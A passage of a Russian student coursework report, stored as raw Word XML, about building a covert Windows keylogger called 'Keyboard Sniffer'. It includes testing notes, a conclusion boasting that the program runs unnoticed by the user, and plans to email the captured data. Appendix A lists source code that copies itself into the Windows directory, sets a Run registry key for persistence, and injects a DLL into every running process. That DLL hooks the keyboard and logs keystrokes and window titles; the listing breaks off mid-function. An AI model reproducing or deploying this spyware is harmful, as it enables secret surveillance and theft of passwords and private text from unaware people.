      </w:r>
      <w:r w:rsidR="00601F1A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001673FA" w:rsidRPr="00D405F0" w:rsidRDefault="001673FA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Запустим приложение</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сниффер Кливиатуры</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Free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Key</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gger</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00D405F0" w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.9”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D405F0" w:rsidRDefault="00D405F0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поле адреса браузер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mozilla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введем тестовую строку </w:t>
      </w:r>
      <w:r w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007E450A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>qwrt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1234567890” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и дважды нажмем системную клавишу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. После чего сравним результаты работы двух программ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E450A" w:rsidRPr="007E450A" w:rsidRDefault="007E450A" w:rsidP="007E450A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7E45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Free</w:t>
      </w:r>
      <w:r w:rsidRPr="00D40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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D40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D405F0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gger</w:t>
      </w:r>
      <w:r w:rsidRPr="00D405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D405F0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.9</w:t>
      </w:r>
      <w:r w:rsidRPr="007E450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7E450A" w:rsidRPr="007E450A" w:rsidRDefault="007E450A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075B65" wp14:editId="753DB398">
            <wp:extent cx="5619750" cy="3284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48" t="9695" r="6521" b="26141"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5633934" cy="329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7E" w:rsidRPr="008E387E" w:rsidRDefault="007E450A" w:rsidP="008E387E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</w:t>
      </w:r>
      <w:r w:rsidRPr="008E387E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Сниффер клавиатуры</w:t>
      </w:r>
      <w:r w:rsidRPr="008E387E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E387E" w:rsidRPr="008E387E" w:rsidRDefault="008E387E" w:rsidP="005B1FF6">
      <w:pPr>
        <w:spacing w:after="240"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E88800" wp14:editId="2414026C">
            <wp:extent cx="436245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073" t="38498" r="11491" b="6464"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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50A" w:rsidRDefault="008E387E" w:rsidP="008E387E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Анализируя результаты работы двух приложений, можно сделать вывод, что записанная информация об активности пользователя идентична.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E387E" w:rsidRPr="008E387E" w:rsidRDefault="008E387E" w:rsidP="008E387E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Программа работает корректно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00601F1A" w:rsidRDefault="00601F1A" w:rsidP="005B1FF6">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00601F1A" w:rsidRPr="005B1FF6" w:rsidRDefault="00601F1A" w:rsidP="005B1FF6">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRDefault="00E8372C" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC4812">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="21" w:name="_Toc414805630"/>
      <w:bookmarkStart w:id="22" w:name="_Toc419842607"/>
      <w:r w:rsidRPr="00FE0B31">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Заключение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00586F70" w:rsidRPr="00586F70" w:rsidRDefault="00586F70" w:rsidP="00586F70"/>
    <w:p w:rsidR="00E8372C" w:rsidRDefault="00FE0B31" w:rsidP="00FE0B31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были спроектирована и разработана программ для отслеживания и записи активности пользователя </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0B31">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ниффер</w:t>
      </w:r>
      <w:r w:rsidR="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> клавиатуры</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0B31">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Приложение способно отслеживать нажатие клавиш и изменение текущего окна, также приложение способно работать незаметно для пользователя, не вызывая подозрений.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0B31" w:rsidRDefault="00FE0B31" w:rsidP="00FE0B31">
      <w:pPr>
        <w:spacing w:after="24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будущем планируется расширение функционала приложения, возможность отправки информации об активности пользователя на почту, сохранение информации в базе данных, для боле</w:t>
      </w:r>
      <w:r w:rsidR="005739EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е удобной работы, поиска, сортировки информации.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0B31" w:rsidRPr="002C67EB" w:rsidRDefault="00FE0B31" w:rsidP="00FE0B31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данного проекта, были получены обширные знания в разработке системного программного обеспечения для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="002C67EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE0B31" w:rsidRPr="00FE0B31" w:rsidRDefault="00FE0B31" w:rsidP="00FE0B31">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="00F02139" w:rsidRDefault="00E8372C" w:rsidP="00586F70">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC4812">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="23" w:name="_Toc414805631"/>
      <w:bookmarkStart w:id="24" w:name="_Toc419842035"/>
      <w:bookmarkStart w:id="25" w:name="_Toc419842608"/>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Список литературы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00E8372C" w:rsidRPr="00AC4812" w:rsidRDefault="00E8372C" w:rsidP="00E8372C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F02139" w:rsidRPr="00F0213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Э. Таненбаум. Современные операционные системы, 3-е издание : Издательство: Питер, 2010. – 1116 с.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Кейлогер— Википедия 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1" w:history="1">
        <w:r w:rsidRPr="00B4279B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/Кейлогер</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F534A9" w:rsidRDefault="00F534A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534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Клавиатурные шпионы. Варианты реализации кейлоггеров в ОС Windows.</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Электронный ресурс</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>. –</w:t>
      </w:r>
      <w:r w:rsidR="00F02139" w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Электронные данные. - </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00F02139" w:rsidRPr="00B4279B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>https://securelist.ru/analysis/77/klaviaturny-e-shpiony-varianty-realiz/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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DLL </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">— </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Wikipedia</w:t>
      </w:r>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>[Электронный ресурс]. – Электронные данные. –</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00B4279B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:eastAsia="en-US"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/DLL_injection</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F02139" w:rsidRPr="00F02139" w:rsidRDefault="00F02139" w:rsidP="00F02139">
      <w:pPr>
        <w:pStyle w:val="ae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  <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>К</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>лавиатурные шпионы (кейлоггеры)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F534A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>[Электронный ресурс]. – Электронные данные.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02139">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - http://www.cyberguru.ru/operating-systems/windows-security/keyloggers-page17.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRDefault="00267D34">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE39B1" w:rsidRPr="00ED07C6" w:rsidRDefault="00267D34" w:rsidP="00ED07C6">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc419842609"/>
      <w:r w:rsidRPr="00ED07C6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение А</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRDefault="00267D34" w:rsidP="00267D34">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00ED07C6" w:rsidRDefault="00267D34" w:rsidP="00586F70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19842610"/>
      <w:r w:rsidRPr="00ED07C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг кода исполняемого файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED07C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27"/>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRDefault="00267D34" w:rsidP="00267D34">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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#define _CRT_SECURE_NO_WARNINGS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#include &lt;Windows.h&gt;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#include &lt;stdio.h&gt;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#include &lt;TlHelp32.h&gt;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#include &lt;iostream&gt;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Inject(DWORD pId, char *dllName);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Install(char* injectionDllName);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int main(int argc, char** argv)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HANDLE hProcessSnap;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PROCESSENTRY32 pe32;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szFilename[] = "";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*injectionDllName = "\\InjectionDll.dll";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dllPath[MAX_PATH];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GetWindowsDirectory(dllPath, MAX_PATH);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strcat(dllPath, injectionDllName);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"Install:"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(Install(injectionDllName))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"success."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hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,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(hProcessSnap == INVALID_HANDLE_VALUE)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pe32.dwSize = sizeof(PROCESSENTRY32);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do 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(!Process32Next(hProcessSnap, &amp;pe32))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//std::cout &lt;&lt; "Can't find Process:"&lt;&lt; szFilename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(Inject(pe32.th32ProcessID, dllPath))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"Injection success:" &lt;&lt; pe32.szExeFile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 while (/*lstrcmpi(pe32.szExeFile, szFilename)*/true);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0;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Install(char* injectionDllName)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HKEY hk;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currentPath[MAX_PATH],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sysbuf[MAX_PATH],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*fileName;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GetModuleFileName(GetModuleHandle(NULL), currentPath, MAX_PATH);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fileName = strrchr(currentPath, '\\');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GetWindowsDirectory(sysbuf, MAX_PATH);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strcat(sysbuf, fileName);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>if (!CopyFile(currentPath, sysbuf, false))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Can't copy file:"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sysbuf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(ERROR_SUCCESS == RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &amp;hk))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RegSetValueEx(hk, "KeyLogger", 0, REG_SZ, (LPBYTE) sysbuf, strlen(sysbuf));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RegCloseKey(hk);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else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Can't create RegKey."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GetModuleFileName(GetModuleHandle(NULL), currentPath, MAX_PATH);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GetWindowsDirectory(sysbuf, MAX_PATH);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strcpy(fileName, injectionDllName);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strcat(sysbuf, fileName);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(!CopyFile(currentPath, sysbuf, false))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Can't copy file:"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sysbuf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true;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Inject(DWORD pId, char *dllName)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HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, false, pId);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(h)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LPVOID LoadLibAddr = (LPVOID) GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");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(LoadLibAddr == NULL) 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the LoadLibraryA function was not found inside kernel32.dll library.\n"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LPVOID dereercomp = VirtualAllocEx(h, NULL, strlen(dllName), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);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(dereercomp == NULL) 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the memory could not be allocated inside the chosen process.\n"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int n = WriteProcessMemory(h, dereercomp, dllName, strlen(dllName),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(n == 0) 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there was no bytes written to the process's address space.\n"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HANDLE asdc = CreateRemoteThread(h, NULL, NULL, (LPTHREAD_START_ROUTINE) LoadLibAddr, dereercomp, 0,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(asdc == NULL) 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printf("Error: the remote thread could not be created.\n");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//WaitForSingleObject(asdc, INFINITE);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//VirtualFreeEx(h, dereercomp, strlen(dllName), MEM_RELEASE);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//CloseHandle(asdc);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//CloseHandle(h);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true;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std::cout &lt;&lt; "Error: Can't open process:" &lt;&lt; pId &lt;&lt; std::endl;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</w:rPr>
        <w:t>//Sleep(10000);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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267D34">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRDefault="00267D34" w:rsidP="00267D34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267D34">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRDefault="00267D34" w:rsidP="00267D34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00586F70" w:rsidRDefault="00267D34" w:rsidP="00586F70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8" w:name="_Toc419842611"/>
      <w:r w:rsidRPr="00586F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг кода инжектируемой библиотеки</w:t>
      </w:r>
      <w:r w:rsidRPr="00586F7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28"/>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00267D34" w:rsidRDefault="00267D34" w:rsidP="00267D34">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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#define _CRT_SECURE_NO_WARNINGS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#include &lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00267D34" w:rsidRPr="00267D34" w:rsidRDefault="007403D3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#include &lt;stdio.h&gt;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#define MAX_BUFSIZE 30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#define MAX_MODULE_NAME 260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HANDLE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file;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HHOOK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hook;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DWORD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prevWinID = NULL;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CHAR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prevModuleName[MAX_MODULE_NAME],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g_buf[MAX_BUFSIZE],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glPath[] = "D:\\";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getCharKey(const DWORD vkCode, const DWORD scanCode, LPWORD ch, const DWORD winID)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BYTE keyState[256];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GetKeyboardState(keyState);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ToAsciiEx(vkCode, scanCode, keyState, ch, 0, GetKeyboardLayout(winID)) == 1;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getSysKey(const DWORD vkCode)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* buf = g_buf + strlen(g_buf);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switch (vkCode)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VK_F1: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"[F1]\r\n");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VK_F2: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"[F2]\r\n");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VK_F3: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"[F3]\r\n");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VK_F4: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"[F4]\r\n");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VK_F5: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"[F5]\r\n");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VK_F6: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"[F6]\r\n");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VK_F7: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"[F7]\r\n");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VK_F8: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"[F8]\r\n");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VK_F9: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"[F9]\r\n");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VK_F10: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"[F10]\r\n");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VK_F11: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"[F11]\r\n");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VK_F12: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"[F12]\r\n");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VK_BACK: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"[BACK]\r\n");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VK_TAB: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"[TAB]\r\n");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VK_RETURN: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"[RET]\r\n");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VK_RCONTROL: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"[RCTRL]\r\n");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VK_LCONTROL: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"[CTRL]\r\n");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>case VK_ESCAPE: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"[ESC]\r\n");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VK_SPACE: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"[SPACE]\r\n");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VK_RSHIFT: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"[RSHIFT]\r\n");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VK_LSHIFT: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"[SHIFT]\r\n");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VK_CAPITAL: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"[CAPSLOCK]\r\n");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VK_DELETE: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"[DELETE]\r\n");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VK_INSERT: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"[INSERT]\r\n");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VK_LWIN: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"[WIN]\r\n");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VK_RWIN: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"[RWIN]\r\n");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VK_UP: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"[UP]\r\n");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VK_DOWN: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"[DOWN]\r\n");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VK_LEFT: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"[LEFT]\r\n");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VK_RIGHT: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"[RIGHT]\r\n");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VK_HOME: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"[HOME]\r\n");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VK_END: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"[END]\r\n");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VK_PRIOR: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"[PGDN]\r\n");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VK_NEXT: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"[PGUP]\r\n");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VK_LMENU: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"[ALT]\r\n");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case VK_RMENU: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strcpy(buf, "[RALT]\r\n"); break;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default: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FALSE;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TRUE;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LRESULT CALLBACK LowLevelKeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)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GetKeyState(NULL);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(nCode == HC_ACTION &amp;&amp; (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))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DWORD written;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KBDLLHOOKSTRUCT *ks = (KBDLLHOOKSTRUCT*) lParam;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SYSTEMTIME st;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moduleName[MAX_MODULE_NAME];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DWORD winID = NULL;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HWND activeWindow = GetForegroundWindow();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GetWindowThreadProcessId(activeWindow, &amp;winID);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GetWindowText(activeWindow, moduleName, MAX_MODULE_NAME);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(winID != prevWinID || strcmp(moduleName, prevModuleName))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prevWinID = winID;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strcpy(prevModuleName, moduleName);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sprintf(moduleName + strlen(moduleName), " : %d", winID);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strcat(moduleName, "\r\n");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WriteFile(file, moduleName, strlen(moduleName), &amp;written,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GetLocalTime(&amp;st);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GetTimeFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, NULL, g_buf, MAX_BUFSIZE);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strcat(g_buf, "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* buf = g_buf + strlen(g_buf);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(getSysKey(ks-&gt;vkCode))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WriteFile(file, g_buf, strlen(g_buf), &amp;written,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else if (getCharKey(ks-&gt;vkCode, ks-&gt;scanCode, (LPWORD) buf, 